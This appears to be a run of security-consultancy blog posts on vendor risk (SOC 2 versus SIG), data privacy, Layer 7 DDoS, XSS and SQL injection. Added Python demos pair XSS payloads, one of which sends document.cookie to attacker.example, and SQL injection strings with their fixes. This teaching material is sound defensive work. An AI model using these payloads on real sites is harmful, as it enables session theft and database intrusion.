TPRM, otherwise known as Third Party Risk Management, is a critical component of your organization's security posture. It is a big focal point for regulators, and we are increasingly forced to consider fourth-party risk as well: the vendors of your vendors.
TPRM is the set of practices used to identify, assess, mitigate, and respond to third-party vendor risk across the engagement life cycle. A TPRM program is essential to reducing the likelihood and impact of data breaches, operational failures, vendor bankruptcy, and reputational damage. Although your organization may rely on third-party service providers, your management team remains responsible for maintaining an effective system of internal control. For example, the broker-dealer regulator FINRA has a litany of enforcement actions against firms that did not adequately oversee their third-party vendors. No one remembers the name of the HVAC contractor whose stolen credentials opened the door to the 2013 Target breach, but everyone remembers that Target was breached.
Outsourcing has become increasingly important as business operations have grown more complex. Less exciting is owning the responsibility for the third parties you bring in.
If your organization sells technology services, customers and prospects have probably asked for a SOC 2 report (System and Organization Controls 2; the name was "Service Organization Control" until 2017). A SOC 2 report can only be issued by a CPA firm with qualified information-systems auditors, and its value derives from an independent third party attesting to the design of your organization's security controls at a point in time (SOC 2 Type I) or to both their design and their operating effectiveness over a review period, typically six to twelve months (SOC 2 Type II). It isn't enough for your organization to say it has adequate security controls; it must prove it to an independent auditor.
Developed by the AICPA (American Institute of Certified Public Accountants), SOC 2 is designed for service organizations that store or process customer data, which today means nearly every SaaS company and any organization that keeps its customers' information in the cloud. So what does SOC 2 require? It is a technical audit, but it goes beyond that: the organization must establish and follow documented information security policies and procedures mapped to the Trust Services Criteria of security, availability, processing integrity, confidentiality, and privacy (security is mandatory; the others are included as the scope requires). A SOC 2 report shows that an organization's controls are actually operating as described, not just written down.
In practice, there are four critical areas to SOC 2 compliance:
SOC 2 compliance centers on implementing and maintaining well-defined, long-term security policies, procedures, and practices.
While SOC 2 is the most requested TPRM document, the largest standards body and professional association for TPRM is Shared Assessments. Shared Assessments provides a wide array of products and services, including the well-known Standardized Information Gathering (SIG) questionnaire, the Certified Third Party Risk Professional (CTPRP) certification, the Vendor Risk Management Maturity Model (VRMMM), and the Agreed Upon Procedures (AUP) for on-site validation of a vendor's answers.
The SIG is a comprehensive questionnaire of roughly 1,500 questions covering the design and operation of an organization's security controls; it is completed by the vendor and can be validated by an independent security professional, who evaluates and reports on the answers and the supporting evidence. Although that objective overlaps with the SOC 2, the SIG is significantly different. It is a holistic tool for risk management assessments of cybersecurity, IT, privacy, data security and business resiliency, and it evaluates third-party vendors across fifteen individual control "domains" by gathering the information needed to determine how security risks are managed.
These domains include:
If 1,500 questions seems insurmountable, there is a slimmer version called SIG Lite. As the name suggests, it is the SIG on a diet (though at over 350 questions, still a full meal); it covers all of the aforementioned domains with fewer questions.
To SIG or to SOC?
Now that you know about the two prominent players in the TPRM game, let's discuss which may be a better fit for your organization and why.
If one of your clients has asked for a SOC 2 report and your organization has gone through the process, then you have my condolences and I understand the deep sigh. A SOC 2 is extremely expensive (it can easily run into six figures), complex and resource-intensive, and, outside of compliance requirements, a challenging report to interpret. The cost, complexity, and resource drain are all significant barriers for SMBs. If your organization is an SMB and contractually obligated to provide a SOC 2 report, you have no choice but to bite the bullet. If not, the SIG can be a vastly less expensive alternative, far more useful to your organization, and more valuable to your customers as well.
Reasons for the SIG:
1. Cost of compliance: the SIG is already written, whereas the audit underlying a SOC 2 report is scoped and designed for each organization. Time spent on-site for a SIG review is reduced significantly because the independent assessor can specify in advance the evidence he or she will require.
2. Resource constraints: completing a SIG questionnaire typically takes 3 to 5 days, while a SOC 2 audit can require several weeks on-site at a minimum.
3. Narrow vs. broad: a SOC 2 audit can be scoped very narrowly relative to the SIG. As mentioned, SOC 2 is a rigorous audit process created and maintained by accountants and focuses on the systems that directly handle clients' data. The SIG provides a more holistic view of your organization's technology stack and operations.
4. More informative: a SIG assessment includes detailed information about sample sizes, testing methodology, and the attributes considered. A client can easily glean from your SIG that your organization has a defined process for detecting unauthorized wireless networks, evidence that the process is being followed, whether any unauthorized wireless networks were detected in the previous six months and, if so, whether they were removed. A SOC 2 Type II report lists the auditor's tests and any exceptions, but not operational detail at this granularity.
While a SOC 2 is the gold standard for third-party attestation, does your organization even need it? You may not be legally required to obtain and maintain a SOC 2 report, but your clients are certainly entitled to adopt a policy requiring one of every vendor, and you are in the business of keeping and growing your client list, not losing it. As for deciding which assessment your organization must complete, start by asking your client what they are specifically interested in. Do they want assurance that your email system is secure, your file storage, your file transfer, or something else? Your client surely knows its peers; don't be bashful about asking what those peers require for audit purposes. If you get a deer-in-the-headlights look, don't be surprised: most clients won't truly know what specific audit evidence they require for themselves, let alone their peers. Armed with the information here, you can steer the conversation.
If non-public personal information is at issue and your client is heavily regulated (e.g. a large financial or healthcare entity), your client may simply be passing on a requirement, and your organization will likely need a SOC 2 report. If not, probe and understand your client's needs. Recently, an information security officer at a large bulge-bracket broker-dealer insisted that a client provide a SOC 2; on doing some research, we learned that the same firm had been involved in the creation of the Shared Assessments framework (along with the Big Four, did I mention that?). The SOC 2 was dropped from the discussion and replaced with the SIG. My point is simply: don't roll over for a SOC 2 requirement if it is not truly required. If you push for the SIG, you are offering a compelling alternative rather than ignoring your client's concern. In short, in many cases a SOC report under SSAE 16/18 is simply the wrong-sized requirement. The SIG at 1,500 questions is no layup either, but either the SIG or the SIG Lite may be better suited to everyone's needs.
In many cases, the SIG is not only less expensive and less resource-intensive, but also more useful, and a better means of communicating the information your clients actually need: your organization's security posture.
The only professionals who can decide the "best" assessment process for your organization are you and your team. The decision will obviously be dictated by the requirements of your customer base, and it can be informed by a security service provider who gathers your requirements and advises on the best fit for your organization's auditing needs.
Before technology took over our lives and data started growing exponentially, the U.S. Postal Service was "the" big-data processor and repository in North America and perhaps the world. To call it an institution of American life is obvious to the point of absurdity. While not known for clockwork efficiency, we all continue to rely on it in one way or another. If you've seen the news recently, you may have felt that gnawing pang of having your privacy violated yet again, as the USPS acknowledged a vulnerability in its website that allowed any logged-in user to view, and in some cases modify, account information on its roughly 60 million users. Before you go log into the USPS account you created to manage the delivery attempts on that important package you missed, it's worth understanding the bigger issue at hand: your data, its value, and how exposure by the entities engrained in our lives and businesses can expose us in ways we don't normally contemplate... and would prefer not to have to worry about at all.
The reality is that your digital footprint is being watched, and the resulting aggregation of data provides a frightening wealth of information about our lives and businesses. Despite the news of hacks, data breaches and massive data exposures, you still scroll through the Terms of Service (ToS) of the new app you just downloaded to get to the "Agree" button. What are the alternatives, right? App makers know better than to bold anything or make anything clear, especially about how your usage will be turned into marketing metadata that leaves a trail behind you. They don't want anything to stand between you and your download, or between them and your personal information. You would rather ignore this and spend your time on more productive endeavors, but there's a little voice inside your head telling you that this will come back to you in one form or another, and it is getting louder.
Your Google searches return, zombie-like, as ads. Your emails are mined for money-making opportunities. Elsewhere, your background, politics and even ethnicity are tracked. Retailers are notified, via Bluetooth and GPS, when you enter their store, along with your likely self-reported income range or demographic and how much time you will probably spend shopping. The irony is that Americans say they care deeply about protecting their data: a recent survey found that being in control of who can get information about us is "very important" to 74% of Americans. But if we care so much, why do we keep giving our information away? It's the "privacy paradox": we do it because we tell ourselves our future self will probably suffer no consequences. We conclude that the worst likely outcome is feeling vaguely violated by the corporate algorithms tracking us along with everyone else. Tech companies find their opening in our short-term reasoning, and our future self cannot stop us from clicking "Agree".
A lucrative market has emerged in mining your data, presumably for legitimate business reasons and your convenience. The data broker industry alone generates around $200bn in annual revenue, none of which reaches the data subjects the data is about. ZDNet has detailed how all four major US carriers sell mobile location data to companies you've never heard of, without your explicit permission. For example, Securus bought geolocation data from a location aggregator called LocationSmart, which in turn bought it from the carriers. All of these corporate relationships are arguably legal, and that alone should be cause for concern, because there is no opt-out for this location sharing: your consent is assumed simply by having a cell phone plan. In a very real sense, you are powerless to prevent your location being used for profit and against you.
What is all this data collection called? You guessed it: Big Data. Big Data brings big benefits: ads focused on what you actually want to buy, smart cars that can help you avoid collisions or call for an ambulance if you get in one anyway, wearable or implantable devices that can monitor your health and notify your doctor if something is going wrong. Big Data also brings big privacy problems, especially when the corporations we entrust by clicking Agree expose our data.
This is not an anti-business viewpoint. If you think about it, it goes to the heart of our trusted networks and communications with one another. If these networks and communications are compromised by our own carelessness and the carelessness of others, what does that do to our society and how we engage with one another? How much damage could it do to the legitimate uses of Big Data in our lives and businesses?
Corporate Data Collection and What You Don’t Realize
How much do companies really know about you? They start with the basics, like your name, address and contact information, and add on demographics, like age, race, occupation and education.
But that's just the beginning, because companies collect lists of people experiencing "life-event triggers": if you are getting married, buying a home, sending a kid to college, or even getting divorced, you pop up on some company's radar. For example, Experian, the credit reporting agency, has a separate marketing services division that sells lists of expecting parents and families with newborns. Companies also collect data about your hobbies and many of the purchases you make. Enjoy reading nonfiction about World War II? Epsilon will sell a list containing your information to companies looking for potential book buyers. Another credit reporting agency, Equifax, has a subsidiary that collects detailed salary and pay-stub information on roughly 40% of employed Americans. Enjoy the perks of your store loyalty cards? Great, but a company called Datalogix holds information on more than $1 trillion in consumer spending across 1,400+ leading brands. Confused how the Internet knows about the classic car you bought in cash five years ago? Your state's DMV may sell personal information, such as your name, address, and the vehicles you own, to companies.
Despite the protections around your medical records, companies like Acxiom capture information about your interest in certain health conditions based on what you buy or what you search for online. Acxiom has lists of people classified as allergy sufferers and dieters, and sells lists of individuals with a propensity to search online for a certain ailment or prescription.
These companies, and others like them, aggregate and sell your online presence as well: the information you post online, your screen names, website addresses, interests, hometown and professional history, and how many friends or followers you have. Acxiom collects information about which social media sites individuals use and whether they are heavy or light online users, and resells it. To give a sense of the scale of a company like Acxiom, it holds information on 500 million people worldwide, including nearly every U.S. consumer.
Why does this matter to you?
There is a refined, in-depth, and legitimately acquired database of sensitive information about you and your business, collected by organizations both with and without your consent, and their use and sharing of that information is largely unregulated. Since your sensitive information is collected, stored and transferred by so many different organizations, imagine the countless opportunities for it to fall into the wrong hands.
As the recent USPS exposure shows, you sadly have little control over it. If you have ever traveled for business or pleasure, you have probably stayed at a Marriott property. Like the USPS, Marriott collects sensitive information about you, and it recently discovered a breach of its guest reservation database affecting roughly 500 million guest records; the intruders had been inside for nearly four years before discovery. They had access to guests' names, birthdates, passport numbers, reservation patterns, and payment card information. Fraudulent charges aside, this information empowers them to steal or mimic your identity, create more illegal opportunities to monetize personal and corporate account information, and cause significant harm. How good are you feeling about clicking "Agree" now?
Do you enjoy a cup of coffee or a tasty donut from Dunkin' Donuts? Even Dunkin' Donuts, a company serving coffee to millions of people across the globe, recently suffered a data breach of its own. While you may not think your coffee-drinking patterns are exploitable, they are a piece of your identity that, combined with other information, forms part of who you are. Still dubious? Say you are traveling out of town with a Marriott reservation, buy a coffee from Dunkin' Donuts, and are expecting an important holiday-season package on your doorstep. A malicious actor could use that information to craft a highly personalized narrative that gets them access to your accounts or convinces people within your trusted network that they are you. Those are just a few data points; think about how such data could be combined with social engineering or other personal data. With all this data and advanced machine learning, we will soon move beyond dumb identity theft to identity theft with context: highly personalized data theft. A malicious actor armed with a few socially engineered contacts might do as good a job of passing as you to your trusted network as, well, you do. What does that mean? It may mean that the most familiar personal and professional relationships you maintain, the ones so personal that additional controls seem unnecessary, become the prime targets of identity theft.
Today, we give away our sensitive information, knowingly and unknowingly, to many organizations with very little thought. We cannot track this information; it is out of our control once disclosed. We permit this on the assumption that the organizations requesting it want to serve our interests (as evidenced by the associated revenues), but this information persists in databases in perpetuity and is valuable to malicious actors, who are outsmarting the security staff at the organizations you have entrusted, perhaps with technologies that were not even contemplated when you first agreed to disclose.
The proper call to action is to become more aware. Information about your life and your business is not valueless. When you give it to a company, even one that intends to act in your or your business's best interests, you are giving away control that you may never regain. Guard your personal and commercial sensitive information; don't be so quick to hand over your name, birthdate and address for that rewards program. Spend more time on the confidentiality and data security provisions of the agreements your business enters into. Do not accept the fiction that everyone, or every business, must forgo protections to reap benefits; that notion does nothing to protect sensitive information once it is disclosed. While we are growing numb to breach notices, the effects on our futures are real. Rest assured that if you agree to release your sensitive information, personal or commercial, it is going to be monetized, and more than once. Now ask yourself: how sure are you that it will only be monetized for legitimate reasons, and how confident are you that the disclosures you make today will not be exploited by current or future technologies and malicious actors? Your answers should guide how sensitive you are to data disclosure going forward.
As 2018 draws to a close, we reflect on the plethora of massive hacks that have caused endless concern for SMB and enterprise security professionals, along with the budget required to mitigate and proactively defend against malicious actors. Yes, there has been a shift in attackers' preferred vectors, and you are once again forced to devote time you don't have to address it.
Cisco's report identifies a concerning shift toward more advanced DDoS (Distributed Denial-of-Service) attacks. DDoS has been around for decades and has evolved into a popular, inexpensive vector because attackers can buy DDoS kits or rent "booter" services that drive massive botnets. The size, scope and sophistication of these attacks keep growing at an alarming rate, with recent volumetric attacks exceeding one terabit per second. Historically, DDoS attacks were aimed at large enterprise networks and focused on layers 3 and 4 of the network stack, flooding links with packets or exhausting connection state. The alarming shift Cisco identified this year is from Layer 3 and 4 floods to the more sophisticated application-layer DDoS, also known as a Layer 7 DDoS. These attacks are hard to detect and even harder to defend against because they tend to be far smaller than Layer 3 and 4 floods and often go unnoticed until it is too late. Many Layer 7 attacks are "low and slow": the requests look like those of real users until the application is inundated and can no longer respond. You may not notice the attack until your front-end application is offline and the back-end systems behind it are overloaded.
How Does This Affect My SMB?
Layer 3 and 4 DDoS attacks sound like something only large enterprise networks have to deal with, right? Well... The effectiveness of any DDoS attack comes from the disparity between the resources it takes to launch the attack and the resources it takes to absorb or mitigate it. With Layer 7 attacks the same principle holds, but the attack does more damage with exponentially less bandwidth. When a user logs into a webmail account, the data and CPU the user's computer spends on the request are tiny compared with what the server consumes checking the credentials, loading the relevant user data from a database, and rendering the response page. Even on a failed login, the front-end application must still hit the database or other APIs to produce the error page. When this disparity is magnified by a botnet aimed at a single web application, the application is easily overwhelmed, resulting in denial of service to legitimate traffic.
Sure Eric, you think, I don't have to worry about numerology and multiple layers except when I am skiing or snow-shoveling (preferably skiing), because I don't have a large enterprise network; why does this matter? Layer 7 attacks have shifted toward SMBs because they work: SMBs lack the resources to absorb or mitigate an attack, so the success rate is higher and a successful compromise is just as profitable. Another reason is the proliferation of Mirai variants. Mirai, malware that turns Linux-based hosts (mostly IoT devices) into remotely controlled "bots" within a massive botnet, was originally used for Layer 3 and 4 floods. Variants of Mirai have since fueled attacks aimed squarely at Layer 7, including a 54-hour barrage against a U.S. college.
Since your website, other customer-facing applications, and the back-end systems supporting them are open to users across the globe, they are prime targets for Layer 7 DDoS attacks designed to break the way those systems interoperate. With application development continuing to shift to the cloud, the application-layer DDoS vector is becoming harder to defend against and mitigate.
With Layer 3 and 4 attacks, you focus on preserving your network's bandwidth, identifying traffic spikes, and throttling; mitigation always comes down to one simple question: who has more network capacity, the attacker or the mitigation service? Successful defense against Layer 7 attacks instead relies on accurately profiling incoming traffic to distinguish humans from bots and hijacked browsers, which makes the defense far more complex than the attack itself.
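The asymmetry described above is also the handle for detecting a Layer 7 flood: instead of counting requests per client, weight each request by what it costs the server, so that a bot sending one failed login per second stands out even though it sends no more requests than a browser fetching static files. The following Python script is an added example, not code from the original post or from Cisco; it parses constructed Apache/nginx "combined" log lines, and the per-endpoint cost table and the threshold are assumptions a practitioner would tune to their own application.

```python
"""Cost-weighted request-rate detection for Layer 7 floods.
Added example, not from the original post. The log format is Apache/nginx
"combined"; the endpoint costs and sample log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Hypothetical per-endpoint server cost. A login attempt forces a password
# hash and a database lookup even when it fails; a cached static file costs ~1.
ENDPOINT_COST = {("POST", "/login"): 10, ("GET", "/search"): 5}
DEFAULT_COST = 1


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # ignore the query string
        "status": int(m["status"]),
    }


def request_cost(method, path):
    return ENDPOINT_COST.get((method, path), DEFAULT_COST)


def detect_l7_flood(lines, window_seconds=10, cost_threshold=50):
    """Return {client_ip: peak_cost} for clients whose cost-weighted request
    volume inside any sliding window exceeds cost_threshold.

    Counting raw requests would miss a low-and-slow attacker; weighting by what
    each request costs the *server* is what exposes the asymmetry. Lines are
    expected in time order, as they are in a log file."""
    recent = defaultdict(deque)      # ip -> deque of (timestamp, cost)
    running = defaultdict(int)       # ip -> cost currently inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, now = rec["ip"], rec["ts"]
        cost = request_cost(rec["method"], rec["path"])
        recent[ip].append((now, cost))
        running[ip] += cost
        # Slide the window: drop requests older than window_seconds.
        while (now - recent[ip][0][0]).total_seconds() > window_seconds:
            _, old = recent[ip].popleft()
            running[ip] -= old
        if running[ip] > cost_threshold:
            flagged[ip] = max(flagged.get(ip, 0), running[ip])
    return flagged


def sample_log():
    """Constructed log: a browser fetching cheap assets, and a bot that sends a
    failed login every second. Both send the same *number* of requests."""
    stamp = "10/Dec/2018:14:00:%02d +0000"
    lines = []
    for sec in range(8):
        lines.append(f'203.0.113.5 - - [{stamp % sec}] "GET /static/app.js HTTP/1.1" 200 512')
        lines.append(f'198.51.100.9 - - [{stamp % sec}] "POST /login HTTP/1.1" 401 310')
    return lines


if __name__ == "__main__":
    for ip, peak in detect_l7_flood(sample_log()).items():
        print(f"{ip}: peak cost {peak} in a 10 s window, consider rate-limiting")
```

Run against the constructed log, only the bot (198.51.100.9) is flagged: eight cheap GETs cost 8, eight failed logins cost 80. In production the cost table would be derived from measured response times or database time per route, and the flagged clients would feed a rate limiter or challenge page rather than a print statement.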
Unless the malicious actors have a vendetta against your SMB, a Layer 7 DDoS attack is just the tip of the iceberg. This vector is commonly a means to an end, setting the stage for more traditional attacks (exploiting known vulnerabilities, cross-site scripting, and SQL injection). In the typical scenario, attackers use a Layer 7 DDoS to weaken defenses or crash security tooling, then use the distraction to gain access to your network and steal sensitive data for profit.
XSS (Cross-site Scripting)
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise trusted websites. The attacker uses the web application to deliver malicious code, generally a browser-side script, to a different end user. The flaws that allow these attacks are widespread and occur anywhere a web application takes input from a user and includes it in its output without validating or encoding it. Your web application is susceptible wherever it accepts visitor input: user forms, search boxes, checkout carts, and so on. This particular Layer 7 attack vector is used to steal a victim's cookies, session tokens, or other sensitive information the browser holds for that site, and it can even rewrite the content of the HTML page rendered to the victim.
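To make the "without validating or encoding it" point concrete, here is an added Python example (not code from the original post) that renders a greeting page two ways, unsafely by string concatenation and safely by HTML-encoding the input, and then walks the resulting markup with the standard library's HTML parser to see what a browser would execute. The page markup and the two payloads are constructed; the second payload shows why encoding only `<` and `>` is not enough when input lands inside an attribute.

```python
"""Reflected XSS: vulnerable rendering beside its hardened form.
Added example, not from the original post; the page markup is constructed."""
import html
from html.parser import HTMLParser


def render_unsafe(name):
    # Vulnerable: untrusted input is spliced straight into both an HTML text
    # node and a quoted attribute value.
    return f'<p>Hello, {name}!</p>\n<input name="q" value="{name}">'


def render_safe(name):
    # Hardened: encode for the HTML context before concatenating. quote=True
    # also converts " and ' so the input cannot close the value="" attribute
    # and start an event-handler attribute of its own.
    safe = html.escape(name, quote=True)
    return f'<p>Hello, {safe}!</p>\n<input name="q" value="{safe}">'


class ActiveContentFinder(HTMLParser):
    """Walks the served markup the way a browser's parser would and records
    anything that executes: <script> tags and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.findings.append(f"{tag}@{attr_name}")


def active_content(markup):
    """Return the list of executable constructs a browser would find in markup."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


# Constructed payloads: one targets the text context, one breaks out of the
# attribute context (the classic reason escaping only < and > is not enough).
PAYLOAD_TEXT = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'

if __name__ == "__main__":
    for label, payload in (("text", PAYLOAD_TEXT), ("attribute", PAYLOAD_ATTR)):
        print(label, "unsafe:", active_content(render_unsafe(payload)))
        print(label, "safe:  ", active_content(render_safe(payload)))
```

With the unsafe renderer the first payload yields a live `<script>` tag and the second yields an `onfocus` handler on the input; the safe renderer yields neither, because the encoded text is just data to the parser. Real applications should get this from a template engine that auto-escapes by context (and a Content Security Policy as a backstop), but the mechanism is exactly what `html.escape` does here.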
The basic premise behind SQL injection is that an attacker manipulates data passed into a web application in order to modify the query that is run on the back-end database. That might seem innocuous at first sight, but it can be extremely damaging. The most concerning aspect is that the naive way to query a database, building the SQL string by concatenating user input, inevitably produces a SQL injection vulnerability. And the most common "fix", replacing each single-quote character with two single quotes to "escape" it, does not solve the underlying problem: it only addresses input that lands inside a quoted string literal, and leaves numeric fields, identifiers and other contexts wide open. Parameterized queries (prepared statements), in which the driver sends the SQL text and the values separately, are the real fix; input validation throughout your applications is the necessary second layer, so that input fields cannot be used as proxies to run arbitrary SQL.
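The claim that quote-doubling does not fix the problem is easy to demonstrate. The following Python script is an added example, not code from the original post; it uses the standard library's sqlite3 module against a constructed three-row users table and shows the naive query, the quote-doubling "fix" succeeding in a string context but failing in a numeric one, and the parameterized query that resists both payloads.

```python
"""SQL injection: the naive query, the quote-doubling "fix", and the real fix.
Added example, not from the original post; uses Python's built-in sqlite3 with
a constructed three-row users table."""
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite database with three users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def double_quotes(value):
    """The common 'escaping' fix: turn each ' into '' so it cannot end a string literal."""
    return str(value).replace("'", "''")


def by_name_vulnerable(conn, username):
    # Naive: the user's input becomes part of the SQL text.
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def by_name_quote_doubled(conn, username):
    # Doubling quotes does stop the classic "' OR '1'='1" payload in a
    # quoted string context...
    sql = f"SELECT username, role FROM users WHERE username = '{double_quotes(username)}'"
    return conn.execute(sql).fetchall()


def by_id_quote_doubled(conn, user_id):
    # ...but a numeric column is not quoted, so the attacker never needs a quote
    # and the "fix" does nothing.
    sql = f"SELECT username, role FROM users WHERE id = {double_quotes(user_id)}"
    return conn.execute(sql).fetchall()


def by_id_parameterized(conn, user_id):
    # Real fix: the SQL text is fixed and the value travels separately, so it
    # can only ever be compared against the id column, never parsed as SQL.
    return conn.execute(
        "SELECT username, role FROM users WHERE id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("naive, payload in string context:   ", by_name_vulnerable(db, "' OR '1'='1"))
    print("quote-doubled, same payload:        ", by_name_quote_doubled(db, "' OR '1'='1"))
    print("quote-doubled, numeric context:     ", by_id_quote_doubled(db, "2 OR 1=1"))
    print("parameterized, same numeric payload:", by_id_parameterized(db, "2 OR 1=1"))
```

The naive lookup returns all three rows for the string payload; the quote-doubled version returns nothing for that payload but still returns all three rows for `2 OR 1=1` in the numeric context; the parameterized version returns only the row whose id actually equals the supplied value, and an empty result for the attack string. The same placeholder mechanism exists in every mainstream driver, and it should be combined with validating that an "id" is in fact an integer before it reaches the query.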
Defense & Mitigation
In addition to those technological recommendations, below are additional recommendations you should heed:
In the 90's, the Internet exploded with the introduction of the web browser, Apple was a struggling company, Google didn't have a website while Yahoo was the king of search, and AOL inundated mail slots with CDs to keep its stranglehold on email. In the 2000's, BlackBerry was king of the smartphone, only to be replaced shortly after Apple's release of the iPhone and its accompanying App Store. With each decade we encounter unimaginable change; we've gone from the desktop web era to the mobile dependency era, and now the wearables era. While massive changes have been occurring within the Big Four accounting firms, their impact has, to date, been muted for the balance of the accounting profession. The next decade, however, will transform the professional accounting landscape in ways many will consider unimaginable. In twenty years the accounting profession will look nothing like it does today, and along the way there will be an unprecedented amount of turnover among firms that adapted too little or too late. In short, the profession will be under immense pressure to deliver value for its clients in a manner that adapts to sweeping technological change.
The sweeping disruption from massive technological change and shifting consumer trends demands a new approach to how the industry creates value for clients and how accounting firms that are small to medium-sized businesses ("SMBs") can compete with the deep resources of the Big Four and emerging large firms. Some accounting offerings are more vulnerable to disruption than others. For example, transactional accounting services have been largely automated by technology; compliance is already undergoing automation, and limited advisory services are following the same trend. These automated core offerings require minimal to no oversight, enabling larger accounting firms to scale at lower operational cost, target different customer markets and ultimately win customers from SMB accounting firms. The impending automation of the accounting professional's core responsibilities will force firms, large and small, to focus on advice- and insight-based services, essentially becoming creative strategy consultants.
A number of emerging disruptive technologies are likely to come up more and more often in client meetings, at accounting conferences, or at workplace happy hours. Let's review some of the more common ones and how they will alter the professional accounting landscape:
Big Data thanks to IoT
Big data and IoT are terms that have been loosely thrown around so much that the mention of them is likely to induce a mild sense of nausea at this point. For definition’s sake, however, “big data” is the collection of data sets so large and complex that they cannot be analyzed by traditional databases or tools, such as spreadsheets. IoT is the ever-growing network of physical objects that feature an IP address for internet connectivity, and the communication that occurs between these objects and other Internet-enabled devices and systems.
Big data impacts nearly every aspect of accounting. In audit, big data produces more data driven audits and valuable insights, providing a better experience for the client and the auditor. In advisory services, big data can identify questions, help monitor and improve business performance, and build analytical models that support a variety of product or operational improvements. In tax, big data offers the opportunity to analyze efficiencies more easily, identify tax related opportunities for improvement, and aid in evaluating global opportunities. Lastly, in managerial accounting, big data helps with risk identification and management.
IoT is already impacting consumers’ purchasing frequency with more pay-for-what-you-use models, with sensors tracking actual usage. This change in purchasing will require new pricing and accounting models and lead to much larger data profiles of each customer. IoT also impacts business processes like invoicing and reporting. Lastly, IoT will impact the way audits are carried out because the availability of real-time data coming from multiple sources and automated analysis will only increase the need for continuous auditing.
New technologies, based on big data and IoT, are reaching into every area of the business world. The amount of data we are able to collect is rising exponentially, driven by the Internet of Things. Due to IoT, in two years, the number of connected devices will be three times the number of people in the world. Increased connectivity leads to larger data sets and big data gives businesses unprecedented amounts of information and the analytical tools for improved decision-making. In turn, accounting professionals can use these same tools to move from data entry, recordkeeping and simple analysis to strategic business consulting. Today, financial controllers and CFOs use structured data, unstructured data, and predictive analytics to understand massive amounts of customer information, financial trends and industry information to make insightful forecasts for clients.
Artificial Intelligence (AI)
AI is technology that enables computers to perform decision-based tasks previously left to humans. It shows up in multiple forms, including machine-based learning that can progressively become better at analysis and decisions the more it is used, and speech-based technology that can understand different voices and languages. It is largely used to digest and analyze large volumes of data at speeds faster than people can ever accomplish. These technological advances were formerly reserved for science fiction, but artificial intelligence has arrived and is rapidly evolving. Early investments by large firms, including several of the Big Four, have paid off with technology that can substantially slash the amount of time an accountant spends on complex audits and asset estimates. All firms, even small ones, should start thinking about how to adopt advanced technology like artificial intelligence (AI), whether it will be by partnering with specialized AI tech companies or building their own technology department.
In preparation for the oncoming wave of AI within the accounting profession, accounting firms that are SMBs must add, develop and retain staff with database and technology skillsets. A solid foundational understanding of data management and a high comfort level with new technologies will give accounting firms an edge as the use of AI increases in the field. Naturally, the professional skepticism auditors have remains necessary to spot when automated analysis goes awry and to deal with exceptions.
If you’re thinking that your accounting firm won’t be able to keep up with the overhead costs of bringing on additional technology staff and developing its own AI products, then don’t fret just yet. AI technology is becoming more accessible and will eventually become standard fare, similar to the advent of the Internet. When the World Wide Web was first publicly available, only large companies could afford to establish an online presence and develop their own networks. That has obviously since changed, and today there is scarcely a firm, or person, left unconnected to the web. The same will happen with AI technology, and it will become a more necessary and common component of doing business. Of course, those who are slightly behind the bleeding edge but ahead of the pack will probably be the best positioned. If you master threading that needle, please let me know; in the meantime, Helical will continue to build out its AI capabilities.
Cognitive computing and machine learning
Cognitive computing is technology that simulates human thought processes in a computerized model. When it comes to the accounting profession, cognitive computing combines artificial intelligence and machine learning to simplify and transform how professionals find information, how they interact with applications to perform knowledge tasks, and how they make decisions.
Within the audit practice, cognitive computing will revolutionize the audit process because it can provide assisted decision-making for auditors. This judgment capability involves things like identifying key audit risks and determining how to design audit procedures to respond adequately to those risks. Audit judgment skills are typically developed and refined through years of experience, training, and interaction with colleagues; cognitive computing combines big data and AI to analyze these judgments from across thousands of audits to aid auditors in real time, while keeping client information private. Technology is paramount to your SMB’s future and, similarly, your clients’ ability to leverage technology will be equally paramount to their futures. Therefore, an emerging business opportunity for your firm is IT audit, which is necessary for complying with audit standards and possibly your own clients’ compliance requirements. Such a service can be readily provided alongside your standard audit offerings. Some firms, like Helical, can even white label these offerings to help firms incorporate these capabilities into their own offerings.
Most big accounting firms are investing heavily in emerging technologies. Big Four firm KPMG announced an alliance with IBM Watson’s artificial intelligence unit to develop high-tech audit tools, and almost all major audit firms have similar initiatives underway. Understandably, accounting firms that are SMBs don’t have access to the capital to make large-scale investments in technologies like cognitive computing. Instead, these firms should look to software providers to incorporate this technology into their offerings so they can capitalize on its abilities. The most important takeaway is to embrace this technological disruption early so your firm can take advantage of the opportunities cognitive computing offers. Being open to this change will ensure that your firm is viable and can compete with the Big Four in the future.
Blockchain is currently the most hyped term you’ll find in any industry because its use cases are practically infinite, but at its core it’s a security and accounting technology for maintaining and transferring ledger information. Since it’s an accounting process, naturally, this is the emerging technology that has the most potential to disrupt the accounting profession.
